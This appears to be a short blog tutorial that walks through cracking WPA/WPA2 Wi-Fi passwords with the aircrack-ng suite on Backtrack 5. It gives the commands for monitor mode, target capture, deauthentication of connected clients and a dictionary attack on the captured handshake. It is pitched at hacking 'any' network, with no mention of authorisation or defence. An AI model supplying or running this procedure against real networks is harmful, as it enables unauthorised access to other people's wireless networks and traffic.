How To Hack Wi-Fi WPA/WPA2 Password With Video Tutorial
Hello everybody, this is today i'm gonna show you how to hack any wi-fi passwords using backtrack 5
What We Need to hack Wi-fi Password?
1)Backtrack 5 [ R1 or R2]
2)Compatable Wi-fi Card
So Let's Start... 1st open Terminal and Then Follow My Steps :
1)In Terminal type : airmon-ng there we can see interfaces
2)Then type :airmon-ng start wlan0 It must found proceses
3)then we type : airodump-ng mon0 it will start scanning wi-fi networks
4)copy bssid and tpye : airodump-ng -c (channel) -w (file name) --bssid (bssid) mon0
5)type : aireplay-ng -0 5 -a (bssid) mon0
6)click on places home folder drag in terminal wpa-01.cap in terminal and type : aircrack-ng (file Directory) or drag file in
7)type in terminal : aircrack-ng (filename)*.cap -w (dictionary location) And Hit Enter!